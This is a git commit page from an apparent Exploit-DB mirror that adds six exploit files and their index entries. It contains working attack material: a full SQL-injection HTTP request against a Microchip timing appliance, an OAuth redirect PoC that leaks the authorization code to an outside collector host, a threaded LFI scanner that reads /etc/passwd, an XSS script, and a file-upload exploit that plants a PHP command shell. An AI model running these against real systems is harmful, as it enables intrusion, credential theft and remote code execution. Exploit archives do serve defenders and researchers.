bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Merge remote-tracking branch 'exploitdb/main'

Browse source
This commit is contained in:
Brendan McDevitt 2025-04-07 00:01:26 +00:00
commit b779de90fb
7 changed files with 636 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

117
exploits/hardware/remote/52122.NA Normal file
View file

@ -0,0 +1,117 @@
# Exploit Title: Microchip TimeProvider 4100 Grandmaster - Unauthenticated SQL Injection
# Exploit Author: Armando Huesca Prida, Marco Negro
# Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli
# Date of Disclosure: 27/06/2024
# Date of CVE Publication: 4/10/2024
# Exploit Publication: 11/10/2024
# Vendor Homepage: https://www.microchip.com/
# Version: Firmware release 1.0 through 2.4.7
# Tested on: Firmware release 2.3.12
# CVE: CVE-2024-7801
# External References:
# URL: https://www.cve.org/cverecord?id=CVE-2024-7801
# URL: https://www.0xhuesca.com/2024/10/cve-2024-7801.html
# URL: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-unathenticated-sql-injection
# URL: https://www.gruppotim.it/it/footer/red-team.html
# Vulnerability Description:
The TimeProvider® 4100 Grandmaster firmware has a SQL injection vulnerability in the “get_chart_data” web resource, specifically the “channelId” parameter is inserted directly into the SQL query (SQLite) at the table's name query parameter from which the FROM operation is performed. Unauthenticated threat actors can manipulate queries to execute malicious SQL commands against the device.
# Example of Malicious SQL Payload:
SELECT%20sql%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20sqlite_master$20WHERE&20type='table'$20LIMIT%201%20OFFSET%200--
# Proof of Concept - PoC:
By manually modifying the following request, it is possible to execute malicious SQL commands against the device. The list of values that must be updated in the exploit HTTP request is given below:
- [malicious SQL payload]
- [device IP]
# Exploit - HTTP Request:
POST /get_chart_data HTTP/1.1
Host: [device IP]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 146
Origin: https://[device IP]
Referer: https://[device IP]/perfmon_synce_stat
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive
metric=mtie_a&xRange=1&tStart=-1&channelName=tenMHz&channelId=
1_status%20UNION%20 [malicious SQL payload] %20UNION%20SELECT%201,%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20tenMHz1
# End

182
exploits/multiple/webapps/52123.NA Normal file
View file

@ -0,0 +1,182 @@
- IBM Security Verify Access >= 10.0.0 <= 10.0.8 - Open Redirect during OAuth Flow
======== < Table of Contents > ================================================
0. Overview
1. Detailed Description
2. Proof Of Concept
3. Solution
4. Disclosure Timeline
5. References
6. Credits
7. Legal Notices
======== < 0. Overview > ======================================================
Revision:
1.0
Impact:
By persuading a victim to visit a specially crafted Web site, a remote
attacker could exploit this vulnerability to spoof the URL displayed
to redirect a user to a malicious Web site that would appear to be
trusted. This could allow the attacker to obtain highly sensitive
information or conduct further attacks against the victim.
Severity:
NIST: High
IBM: Medium
CVSS Score:
NIST 8.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
IBM 6.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N)
CVE-ID:
CVE-2024-35133
Vendor:
IBM
Affected Products:
IBM Security Verify Access
IBM Security Verify Access Docker
Affected Versions:
10.0.0 - 10.0.8
Product Description:
IBM Security Verify Access is a complete authorization and network
security policy management solution. It provides end-to-end protection
of resources over geographically dispersed intranets and extranets.
In addition to state-of-the-art security policy management, IBM Security
Verify Access provides authentication, authorization, data security, and
centralized resource management capabilities.
IBM Security Verify Access offers the following features:
Authentication ~ Provides a wide range of built-in authenticators and
supports external authenticators.
Authorization ~ Provides permit and deny decisions for protected resources
requests in the secure domain through the authorization API.
Data security and centralized resource management ~ Manages secure access
to private internal network-based resources by using the public Internet's
broad connectivity and ease of use with a corporate firewall system.
======== < 1. Detailed Description > ==========================================
During a Penetration Test of the OAuth flow for a client, it was found an
Open Redirect vulnerability that can led to the leakage of the OAuth "code" variable.
It was possible to bypass the parser's logic responsible for verifying the
correctness and the validity of the "redirect_uri" parameter during an OAuth
flow by leveraging RFC 3986 (3.2.1) providing a username and password directly
in the Uniform Resource Identifier (URI).
By providing as the "username" field a legitimate and expected domain, it
was possible to bypass the whitelist filter used by "IBM Security Verify Access"
and cause an Open Redirect to any arbitrary domain controlled by the attacker,
not only altering the expected flow and redirect a user to a malicious
Web site that would appear to be trusted.
This could allow the attacker to obtain highly sensitive like the OAuth "code"
token or conduct further attacks against the victim
======== < 2. Proof of Concepts > =============================================
===== REQUEST =====
[[
GET /oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=https://legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+ HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
]]
===== RESPONSE =====
[[
HTTP/1.1 302 Found
content-language: en-US
date: Tue, 19 Mar 2024 16:04:35 GMT
location: https://legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED]
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-frame-options: DENY
x-content-type-options: nosniff
cache-control: no-store
x-xss-protection: 1; mode=block
x-permitted-cross-domain-policies: none
cross-origin-resource-policy: same-site
content-security-policy: frame-ancestors 'none'
referrer-policy: no-referrer-when-downgrade
strict-transport-security: max-age=31536000; includeSubDomains
pragma: no-cache
Content-Length: 0.
]]
======== < 3. Solution > ======================================================
Refer to IBM Security Bulletin 7166712 for patch, upgrade or
suggested workaround information.
See "References" for more details.
======== < 4. Disclosure Timeline > ===========================================
19/03/2024 - Vulnerability discovered by the Security Researcher (Giulio Garzia)
21/03/2024 - Vulnerability shared with the client who committed the
Penetration Test on his infrastructure, relying on IBM SVA
02/04/2024 - Vulnerability shared with IBM
02/04/2024 - Vulnerability taken over by IBM
14/05/2024 - Vulnerability confirmed by IBM
18/07/2024 - Pre-release provided by IBM to the customer to verify the
resolution of the vulnerability
27/08/2024 - Security Bulletin and vulnerability shared by IBM
======== < 5. References > ====================================================
(1) https://www.ibm.com/support/pages/security-bulletin-security-vulnerability-was-fixed-ibm-security-verify-access-cve-2024-35133
(2) https://exchange.xforce.ibmcloud.com/vulnerabilities/291026
(3) https://nvd.nist.gov/vuln/detail/CVE-2024-35133
(4) https://cwe.mitre.org/data/definitions/178.html
======== < 6. Credits > =======================================================
This vulnerability was discovered and reported by:
Giulio Garzia 'Ozozuz'
Contacts:
https://www.linkedin.com/in/giuliogarzia/
https://github.com/Ozozuz
======== < 7. Legal Notices > ================================================
Copyright (c) 2024 Giulio Garzia "Ozozuz"
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information.
Use of the information constitutes acceptance for use in an AS IS
condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of,
or reliance on,this information.

10
exploits/multiple/webapps/52124.txt Normal file
View file

@ -0,0 +1,10 @@
# Exploit Title: Next.js Middleware Bypass Vulnerability (CVE-2025-29927)
# Date: 2025-03-26
# Exploit Author: kOaDT
# Vendor Homepage: https://nextjs.org/
# Software Link: https://github.com/vercel/next.js
# Version: 13.0.0 - 13.5.8 / 14.0.0 - 14.2.24 / 15.0.0 - 15.2.2 / 11.1.4 - 12.3.4
# Tested on: Ubuntu 22.04.5 LTS
# CVE: CVE-2025-29927
# PoC: https://raw.githubusercontent.com/kOaDT/poc-cve-2025-29927/refs/heads/main/exploit.js
# POC GitHub Repository: https://github.com/kOaDT/poc-cve-2025-29927/tree/main

134
exploits/multiple/webapps/52125.py Executable file
View file

@ -0,0 +1,134 @@
# Exploit Title: Kubio AI Page Builder <= 2.5.1 - Local File Inclusion (LFI)
# Date: 2025-04-04
# Exploit Author: Sheikh Mohammad Hasan (https://github.com/4m3rr0r)
# Vendor Homepage: https://wordpress.org/plugins/kubio/
# Software Link: https://downloads.wordpress.org/plugin/kubio.2.5.1.zip
# Reference: https://www.cve.org/CVERecord?id=CVE-2025-2294
# Version: <= 2.5.1
# Tested on: WordPress 6.4.2 (Ubuntu 22.04 LTS)
# CVE: CVE-2025-2294
"""
Description:
The Kubio AI Page Builder plugin for WordPress contains a Local File Inclusion vulnerability
in the `kubio_hybrid_theme_load_template` function. This allows unauthenticated attackers to
read arbitrary files via path traversal. Can lead to RCE when combined with file upload capabilities.
"""
import argparse
import re
import requests
from urllib.parse import urljoin
from concurrent.futures import ThreadPoolExecutor
class Colors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def parse_version(version_str):
parts = list(map(int, version_str.split('.')))
while len(parts) < 3:
parts.append(0)
return tuple(parts[:3])
def check_plugin_version(target_url):
readme_url = urljoin(target_url, 'wp-content/plugins/kubio/readme.txt')
try:
response = requests.get(readme_url, timeout=10)
if response.status_code == 200:
version_match = re.search(r'Stable tag:\s*([\d.]+)', response.text, re.I)
if not version_match:
return False, "Version not found"
version_str = version_match.group(1).strip()
try:
parsed_version = parse_version(version_str)
except ValueError:
return False, f"Invalid version format: {version_str}"
return parsed_version <= (2, 5, 1), version_str
return False, f"HTTP Error {response.status_code}"
except Exception as e:
return False, f"Connection error: {str(e)}"
def exploit_vulnerability(target_url, file_path, show_content=False):
exploit_url = f"{target_url}/?__kubio-site-edit-iframe-preview=1&__kubio-site-edit-iframe-classic-template={file_path}"
try:
response = requests.get(exploit_url, timeout=10)
if response.status_code == 200:
if show_content:
print(f"\n{Colors.OKGREEN}[+] File content from {target_url}:{Colors.ENDC}")
print(Colors.OKBLUE + response.text + Colors.ENDC)
return True
return False
except Exception as e:
return False
def process_url(url, file_path, show_content, output_file):
print(f"{Colors.HEADER}[*] Checking: {url}{Colors.ENDC}")
is_vuln, version_info = check_plugin_version(url)
if is_vuln:
print(f"{Colors.OKGREEN}[+] Vulnerable: {url} (Version: {version_info}){Colors.ENDC}")
exploit_success = exploit_vulnerability(url, file_path, show_content)
if output_file and exploit_success:
with open(output_file, 'a') as f:
f.write(f"{url}\n")
return url if exploit_success else None
else:
print(f"{Colors.FAIL}[-] Not vulnerable: {url} ({version_info}){Colors.ENDC}")
return None
def main():
parser = argparse.ArgumentParser(description="Kubio Plugin Vulnerability Scanner")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-u", "--url", help="Single target URL (always shows file content)")
group.add_argument("-l", "--list", help="File containing list of URLs")
parser.add_argument("-f", "--file", default="../../../../../../../../etc/passwd",
help="File path to exploit (default: ../../../../../../../../etc/passwd)")
parser.add_argument("-o", "--output", help="Output file to save vulnerable URLs")
parser.add_argument("-v", "--verbose", action="store_true",
help="Show file contents when using -l/--list mode")
parser.add_argument("-t", "--threads", type=int, default=5,
help="Number of concurrent threads for list mode")
args = parser.parse_args()
# Determine operation mode
if args.url:
# Single URL mode - always show content
process_url(args.url, args.file, show_content=True, output_file=args.output)
elif args.list:
# List mode - handle multiple URLs
with open(args.list, 'r') as f:
urls = [line.strip() for line in f.readlines() if line.strip()]
print(f"{Colors.BOLD}[*] Starting scan with {len(urls)} targets...{Colors.ENDC}")
with ThreadPoolExecutor(max_workers=args.threads) as executor:
futures = []
for url in urls:
futures.append(
executor.submit(
process_url,
url,
args.file,
args.verbose,
args.output
)
)
vulnerable_urls = [future.result() for future in futures if future.result()]
print(f"\n{Colors.BOLD}[*] Scan complete!{Colors.ENDC}")
print(f"{Colors.OKGREEN}[+] Total vulnerable URLs found: {len(vulnerable_urls)}{Colors.ENDC}")
if args.output:
print(f"{Colors.OKBLUE}[+] Vulnerable URLs saved to: {args.output}{Colors.ENDC}")
if __name__ == "__main__":
main()

91
exploits/multiple/webapps/52126.py Executable file
View file

@ -0,0 +1,91 @@
# Exploit Title: Exclusive Addons for Elementor ≤ 2.6.9 - Authenticated Stored Cross-Site Scripting (XSS)
# Original Author: Wordfence Security Team
# Exploit Author: Al Baradi Joy
# Exploit Date: March 13, 2024
# Vendor Homepage: https://exclusiveaddons.com/
# Software Link: https://wordpress.org/plugins/exclusive-addons-for-elementor/
# Version: Up to and including 2.6.9
# Tested Versions: 2.6.9
# CVE ID: CVE-2024-1234
# Vulnerability Type: Stored Cross-Site Scripting (XSS)
# Description:
The Exclusive Addons for Exclusive Addons for Elementor for WordPress, in versions up to
and including 2.6.9, is vulnerable to stored cross-site scripting (XSS) via
the 's' parameter. Due to improper input sanitization and output escaping,
an attacker with contributor-level permissions or higher can inject
arbitrary JavaScript that executes when a user views the affected page.
# Proof of Concept: Yes
# Categories: Web Application, Cross-Site Scripting (XSS), WordPress Plugin
# CVSS Score: 6.5 (Medium)
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
# Notes:
To exploit this vulnerability, an attacker needs an authenticated user role
with permission to edit posts. Injecting malicious JavaScript can lead to
session hijacking, redirections, and other client-side attacks.
## Exploit Code:
```python
import requests
from urllib.parse import urlparse
# Banner
def display_banner():
exploit_title = "CVE-2024-1234: Exclusive Addons for Elementor Plugin
Stored XSS"
print("="*50)
print(f"Exploit Title: {exploit_title}")
print("Made By Al Baradi Joy")
print("="*50)
# Function to validate URL
def validate_url(url):
# Check if the URL is valid and well-formed
parsed_url = urlparse(url)
if not parsed_url.scheme in ["http", "https"]:
print("Error: Invalid URL. Please ensure the URL starts with http://
or https://")
return False
return True
# Function to exploit XSS vulnerability
def exploit_xss(target_url):
# The XSS payload to inject
payload = "<script>alert('XSS Exploit')</script>"
# The parameters to be passed (in this case, we are exploiting the 's'
parameter)
params = {
's': payload
}
# Send a GET request to the vulnerable URL with the payload
try:
print(f"Sending exploit to: {target_url}")
response = requests.get(target_url, params=params, timeout=10)
# Check if the status code is OK and if the payload is reflected in
the response
if response.status_code == 200 and payload in response.text:
print(f"XSS exploit successful! Payload: {payload}")
elif response.status_code != 200:
print(f"Error: Received non-OK status code
{response.status_code}")
else:
print("Exploit failed or no XSS reflected.")
except requests.exceptions.RequestException as e:
print(f"Error: Request failed - {e}")
except Exception as e:
print(f"Unexpected error: {e}")
if __name__ == "__main__":
# Display banner
display_banner()
# Ask the user for the target URL
target_url = input("Enter the target URL: ").strip()
# Validate the provided URL
if validate_url(target_url):
# Call the exploit function if URL is valid
exploit_xss(target_url)

95
exploits/multiple/webapps/52127.py Executable file
View file

@ -0,0 +1,95 @@
# Exploit Title: WordPress Plugin Royal Elementor Addons <= 1.3.78 - Unauthenticated Arbitrary File Upload (RCE)
# Date: 2025-04-04
# Exploit Author: Sheikh Mohammad Hasan (https://github.com/4m3rr0r)
# Vendor Homepage: https://royal-elementor-addons.com
# Software Link: https://downloads.wordpress.org/plugin/royal-elementor-addons.1.3.78.zip
# Version: <= 1.3.78
# Tested on: WordPress 6.3.1, Royal Elementor Addons 1.3.78, Ubuntu 22.04 + Apache2 + PHP 8.1
# CVE: CVE-2023-5360
# Description:
# The Royal Elementor Addons and Templates WordPress plugin before 1.3.79 does not properly validate uploaded files,
# which allows unauthenticated users to upload arbitrary files (such as .php), leading to Remote Code Execution (RCE).
import requests
import json
import re
import argparse
import tempfile
from urllib.parse import urljoin
from rich.console import Console
requests.packages.urllib3.disable_warnings()
console = Console()
def get_nonce(target):
try:
r = requests.get(target, verify=False, timeout=10)
m = re.search(r'var\s+WprConfig\s*=\s*({.*?});', r.text)
if m:
nonce = json.loads(m.group(1)).get("nonce")
return nonce
except:
pass
return None
def upload_shell(target, nonce, file_path):
ajax_url = urljoin(target, "/wp-admin/admin-ajax.php")
with open(file_path, "rb") as f:
files = {"uploaded_file": ("poc.ph$p", f.read())}
data = {
"action": "wpr_addons_upload_file",
"max_file_size": 0,
"allowed_file_types": "ph$p",
"triggering_event": "click",
"wpr_addons_nonce": nonce
}
try:
r = requests.post(ajax_url, data=data, files=files, verify=False, timeout=10)
if r.status_code == 200 and "url" in r.text:
resp = json.loads(r.text)
return resp["data"]["url"]
except:
pass
return None
def generate_default_shell():
with tempfile.NamedTemporaryFile(delete=False, suffix=".php") as tmp:
shell_code = '<?php echo "Shell by 4m3rr0r - "; system($_GET["cmd"]); ?>'
tmp.write(shell_code.encode())
return tmp.name
def main():
parser = argparse.ArgumentParser(description="Royal Elementor Addons <= 1.3.78 - Unauthenticated Arbitrary File Upload (RCE)")
parser.add_argument("-u", "--url", required=True, help="Target WordPress URL (e.g., https://target.com/)")
parser.add_argument("-f", "--file", help="Custom PHP shell file to upload")
args = parser.parse_args()
console.print("[cyan][*] Getting nonce from WprConfig JS object...[/cyan]")
nonce = get_nonce(args.url)
if not nonce:
console.print("[red][-] Failed to retrieve WprConfig nonce.[/red]")
return
console.print(f"[green][+] Nonce found: {nonce}[/green]")
if args.file:
shell_file = args.file
console.print(f"[cyan][*] Using provided shell: {shell_file}[/cyan]")
else:
console.print("[cyan][*] No shell provided. Creating default RCE shell...[/cyan]")
shell_file = generate_default_shell()
console.print(f"[green][+] Default shell created at: {shell_file}[/green]")
console.print("[cyan][*] Uploading shell...[/cyan]")
uploaded_url = upload_shell(args.url, nonce, shell_file)
if uploaded_url:
console.print(f"[green][+] Shell uploaded successfully: {uploaded_url}[/green]")
if not args.file:
console.print(f"[yellow][>] Access it with: {uploaded_url}?cmd=id[/yellow]")
else:
console.print("[red][-] Upload failed. Target may be patched or not vulnerable.[/red]")
if __name__ == "__main__":
main()

8
files_exploits.csv
View file

@ -3762,6 +3762,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
40589,exploits/hardware/remote/40589.html,"MiCasaVerde VeraLite - Remote Code Execution",2016-10-20,"Jacob Baines",remote,hardware,,2016-10-20,2016-10-27,0,CVE-2013-4863;CVE-2016-6255,,,,,
52119,exploits/hardware/remote/52119.NA,"Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection",2025-04-04,"Armando Huesca Prida",remote,hardware,,2025-04-04,2025-04-04,0,CVE-2024-9054,,,,,
52120,exploits/hardware/remote/52120.NA,"Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS)",2025-04-04,"Armando Huesca Prida",remote,hardware,,2025-04-04,2025-04-04,0,CVE-2024-43687,,,,,
52122,exploits/hardware/remote/52122.NA,"Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection",2025-04-05,"Armando Huesca Prida",remote,hardware,,2025-04-05,2025-04-05,0,CVE-2024-7801,,,,,
45040,exploits/hardware/remote/45040.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Default Credentials",2018-07-17,LiquidWorm,remote,hardware,,2018-07-17,2018-07-17,0,,,,,,
45578,exploits/hardware/remote/45578.cpp,"MicroTik RouterOS < 6.43rc3 - Remote Root",2018-10-10,"Jacob Baines",remote,hardware,,2018-10-10,2018-10-10,0,CVE-2018-14847,Remote,,,,
41718,exploits/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",remote,hardware,,2017-03-24,2017-03-24,0,CVE-2017-7240,,,,,
@ -11882,6 +11883,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48376,exploits/multiple/webapps/48376.txt,"EspoCRM 5.8.5 - Privilege Escalation",2020-04-24,Besim,webapps,multiple,,2020-04-24,2020-04-24,0,,,,,,
38016,exploits/multiple/webapps/38016.txt,"ESRI ArcGIS for Server - 'where' SQL Injection",2012-11-09,anonymous,webapps,multiple,,2012-11-09,2017-11-09,1,CVE-2012-4949;OSVDB-87277,,,,,https://www.securityfocus.com/bid/56474/info
10209,exploits/multiple/webapps/10209.txt,"Everfocus 1.4 - EDSR Remote Authentication Bypass",2009-10-14,"Andrea Fabrizi",webapps,multiple,,2009-10-13,,1,CVE-2009-3828;OSVDB-59139,,2009-11-22-EverFocus_Edsr_Exploit.tar.gz,,,
52126,exploits/multiple/webapps/52126.py,"Exclusive Addons for Elementor 2.6.9 - Stored Cross-Site Scripting (XSS)",2025-04-05,"Al Baradi Joy",webapps,multiple,,2025-04-05,2025-04-05,0,CVE-2024-1234,,,,,
49146,exploits/multiple/webapps/49146.txt,"Expense Management System - 'description' Stored Cross Site Scripting",2020-12-02,"Nikhil Kumar",webapps,multiple,,2020-12-02,2020-12-02,0,,,,,,
49760,exploits/multiple/webapps/49760.txt,"ExpressVPN VPN Router 1.0 - Router Login Panel's Integer Overflow",2021-04-13,"Jai Kumar Sharma",webapps,multiple,,2021-04-13,2021-04-13,0,CVE-2020-29238,,,,,
49432,exploits/multiple/webapps/49432.sh,"EyesOfNetwork 5.3 - File Upload Remote Code Execution",2021-01-15,"Audencia Business SCHOOL Red Team",webapps,multiple,,2021-01-15,2021-01-15,0,,,,,,
@ -11959,6 +11961,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
15473,exploits/multiple/webapps/15473.html,"IBM OmniFind - Cross-Site Request Forgery",2010-11-09,"Fatih Kilic",webapps,multiple,,2010-11-09,2010-11-09,0,CVE-2010-3891;OSVDB-69083,,,,,
46017,exploits/multiple/webapps/46017.txt,"IBM Operational Decision Manager 8.x - XML External Entity Injection",2018-12-19,"Mohamed M.Fouad",webapps,multiple,9443,2018-12-19,2018-12-19,1,CVE-2018-1821,"XML External Entity (XXE)",,,,
32631,exploits/multiple/webapps/32631.txt,"IBM Rational ClearCase 7/8 - Cross-Site Scripting",2008-12-01,IBM,webapps,multiple,,2008-12-01,2014-04-01,1,CVE-2008-5330;OSVDB-50369,,,,,https://www.securityfocus.com/bid/32574/info
52123,exploits/multiple/webapps/52123.NA,"IBM Security Verify Access 10.0.0 - Open Redirect during OAuth Flow",2025-04-05,"Giulio Garzia",webapps,multiple,,2025-04-05,2025-04-05,0,CVE-2024-35133,,,,,
45190,exploits/multiple/webapps/45190.txt,"IBM Sterling B2B Integrator 5.2.0.1/5.2.6.3 - Cross-Site Scripting",2018-08-13,"Vikas Khanna",webapps,multiple,,2018-08-13,2018-08-13,1,CVE-2018-1563;CVE-2018-1513,,,,,
34908,exploits/multiple/webapps/34908.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/acl?method' Cross-Site Scripting",2010-10-22,IBM,webapps,multiple,,2010-10-22,2014-10-06,1,CVE-2010-4120;OSVDB-68885,,,,,https://www.securityfocus.com/bid/44382/info
34909,exploits/multiple/webapps/34909.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/domain?method' Cross-Site Scripting",2010-10-22,IBM,webapps,multiple,,2010-10-22,2014-10-06,1,CVE-2010-4120;OSVDB-68886,,,,,https://www.securityfocus.com/bid/44382/info
@ -12024,6 +12027,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50521,exploits/multiple/webapps/50521.py,"KONGA 0.14.9 - Privilege Escalation",2021-11-15,"Fabricio Salomao",webapps,multiple,,2021-11-15,2021-11-15,0,,,,,http://www.exploit-db.comkonga-0.14.9.zip,
34224,exploits/multiple/webapps/34224.txt,"Kryn.cms 6.0 - Cross-Site Request Forgery / HTML Injection",2010-06-29,TurboBorland,webapps,multiple,,2010-06-29,2014-08-01,1,,,,,,https://www.securityfocus.com/bid/41229/info
52097,exploits/multiple/webapps/52097.NA,"KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR)",2025-03-27,"Okan Kurtulus",webapps,multiple,,2025-03-27,2025-03-27,0,CVE-2024-46528,,,,,https://github.com/advisories/GHSA-p26r-gfgc-c47h
52125,exploits/multiple/webapps/52125.py,"Kubio AI Page Builder 2.5.1 - Local File Inclusion (LFI)",2025-04-05,4m3rr0r,webapps,multiple,,2025-04-05,2025-04-05,0,CVE-2025-2294,,,,,
49733,exploits/multiple/webapps/49733.txt,"Latrix 0.6.0 - 'txtaccesscode' SQL Injection",2021-04-01,cptsticky,webapps,multiple,,2021-04-01,2021-04-01,0,,,,,,
48453,exploits/multiple/webapps/48453.txt,"LibreNMS 1.46 - 'search' SQL Injection",2020-05-11,Punt,webapps,multiple,,2020-05-11,2020-05-11,0,,,,,,
49246,exploits/multiple/webapps/49246.py,"LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection",2020-12-14,Hodorsec,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
@ -12120,6 +12124,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49160,exploits/multiple/webapps/49160.txt,"NewsLister - Authenticated Persistent Cross-Site Scripting",2020-12-02,"Emre Aslan",webapps,multiple,,2020-12-02,2020-12-02,0,,,,,,
43911,exploits/multiple/webapps/43911.html,"Nexpose < 6.4.66 - Cross-Site Request Forgery",2018-01-28,"Shwetabh Vishnoi",webapps,multiple,,2018-01-28,2018-01-28,0,CVE-2017-5264,,,,,
23924,exploits/multiple/webapps/23924.txt,"Nexpose Security Console - Cross-Site Request Forgery",2013-01-06,"Robert Gilbert",webapps,multiple,,2013-01-06,2013-01-06,1,CVE-2012-6493;OSVDB-88923,,,,,
52124,exploits/multiple/webapps/52124.txt,"Next.js Middleware 15.2.2 - Authorization Bypass",2025-04-05,kOaDT,webapps,multiple,,2025-04-05,2025-04-05,0,CVE-2025-29927,,,,,
24967,exploits/multiple/webapps/24967.txt,"Nginx 0.6.x - Arbitrary Code Execution NullByte Injection",2013-04-19,"Neal Poole",webapps,multiple,,2013-04-19,2013-04-19,1,OSVDB-92634,,,http://www.exploit-db.com/screenshots/idlt25000/screen-shot-2013-04-18-at-24716-pm.png,http://www.exploit-db.comnginx-0.6.36.tar.gz,https://nealpoole.com/blog/2011/08/possible-arbitrary-code-execution-with-null-bytes-php-and-old-versions-of-nginx/
47301,exploits/multiple/webapps/47301.txt,"Nimble Streamer 3.0.2-2 < 3.5.4-9 - Directory Traversal",2019-08-23,MaYaSeVeN,webapps,multiple,,2019-08-23,2019-08-23,0,CVE-2019-11013,,,,,
48875,exploits/multiple/webapps/48875.txt,"NodeBB Forum 1.12.2-1.14.2 - Account Takeover",2020-10-14,"Muhammed Eren Uygun",webapps,multiple,,2020-10-14,2020-10-14,0,,,,,,
@ -12237,6 +12242,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46992,exploits/multiple/webapps/46992.py,"RedwoodHQ 2.5.5 - Authentication Bypass",2019-06-17,EthicalHCOP,webapps,multiple,,2019-06-17,2019-06-17,0,,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,
52081,exploits/multiple/webapps/52081.txt,"reNgine 2.2.0 - Command Injection (Authenticated)",2024-10-01,"Caner Tercan",webapps,multiple,,2024-10-01,2024-10-01,0,,,,,,
18553,exploits/multiple/webapps/18553.txt,"Rivettracker 1.03 - Multiple SQL Injections",2012-03-03,"Ali Raheem",webapps,multiple,,2012-03-03,2012-03-16,0,OSVDB-85702;OSVDB-79806;CVE-2012-4996;CVE-2012-4993;OSVDB-79805,,,,http://www.exploit-db.comrivettracker_1-03.zip,
52127,exploits/multiple/webapps/52127.py,"Royal Elementor Addons and Templates 1.3.78 - Unauthenticated Arbitrary File Upload",2025-04-05,4m3rr0r,webapps,multiple,,2025-04-05,2025-04-05,0,CVE-2023-5360,,,,,
11405,exploits/multiple/webapps/11405.txt,"RSA - SecurID Cross-Site Scripting",2010-02-11,s4squatch,webapps,multiple,80,2010-02-10,,1,OSVDB-43844;CVE-2008-1470,,,,,
